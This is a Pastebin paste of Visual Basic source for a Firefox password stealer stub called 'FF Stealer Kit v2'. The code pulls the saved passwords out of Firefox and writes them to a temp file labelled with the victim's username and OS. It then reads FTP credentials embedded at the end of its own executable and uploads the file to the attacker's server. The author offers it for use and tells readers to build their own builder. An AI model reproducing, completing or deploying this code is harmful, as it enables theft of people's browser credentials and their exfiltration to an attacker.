Advertisement
Guest User

Untitled

a guest
Jun 9th, 2017
564
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. FF Stealer Kit v2
  2.  
  3. This is the code of an FF stealers stub ( working with eof datas ) I just wrote.
  4.  
  5. Yes no builder i just wrote the stub. code your own...
  6.  
  7. ==
  8. '---------------------------------------------------------------------------------------
  9. ' Project     : FF-Kit v2
  10. ' DateTime    : 16/08/2009 17:32
  11. ' Author      : haZl0oh
  12. ' Credits     : Cobein ( cFtp,Cffpd )
  13. ' Mail        : ud.support@live.de
  14. ' Purpose     : Easy way to build an ftp firefox pwd retriever STUB
  15. '
  16. ' Requirements: Firefox 3.5.x
  17. '
  18. ' Distribution: You can freely use this code in your own
  19. '               applications, but you may not reproduce
  20. '               or publish this code on any web site,
  21. '               online service, or distribute as source
  22. '               on any media without express permission.
  23. '
  24. '
  25. '
  26. ' History     : 16/08/2009 Created......................................................
  27. '---------------------------------------------------------------------------------------
  28. Dim c As New cFTP  'add cFtp from Cobein to your project
  29. Dim f As New cFFPD 'add cFFpd from Cobein to your project
  30.  
  31. Sub Main()
  32. Dim mData As String, lFile As String, rFile As String: lFile = Environ("temp") & "\file.txt": rFile = Environ("username") & "." & Date & "." & Environ("os") & ".txt"
  33.     'save passes to text file
  34.    mData = f.Enumerate: Open lFile For Output As #1: Print #1, , mData: Close #1
  35.  
  36. Call Getdata
  37. End Sub
  38. Public Function FileExists(strFile As String) As Boolean
  39.     On Error GoTo Err
  40.     FileExists = (Len(Dir(strFile)) > 0)
  41. Err:
  42. End Function
  43. Sub Getdata()
  44. Dim sEof As String, sEofData() As String, user As String, pass As String, port As String, url As String
  45.  
  46. Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #1
  47.     sEof = Space(LOF(1))
  48.     Get #1, , sEof
  49. Close #1
  50.    
  51.         sEofData = Split(sEof, "YOUR_DELIMETER")
  52. ' another way to split the data chose your favourite
  53. ' sEofData = Split(sEof, Right$(sEof, 5)) 'your deliemter (last 5 characters of eof data) have to be 5 characters long.It will get the delimeter from own file no need to add it into the stub
  54.  
  55.  url = sEofData(0) ' "YOUR_FTP_URL"
  56. user = sEofData(1) ' "YOUR_FTP_USERNAME"
  57. pass = sEofData(2) ' "YOUR_FTP_PASSWORD"
  58. port = sEofData(3) ' "YOUR_FTP_PORT"
  59.  
  60. c.Connect url, user, pass, port: c.PutFile lFile, rFile: c.Disconnect
  61. End
  62. End Sub
  63. ==
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement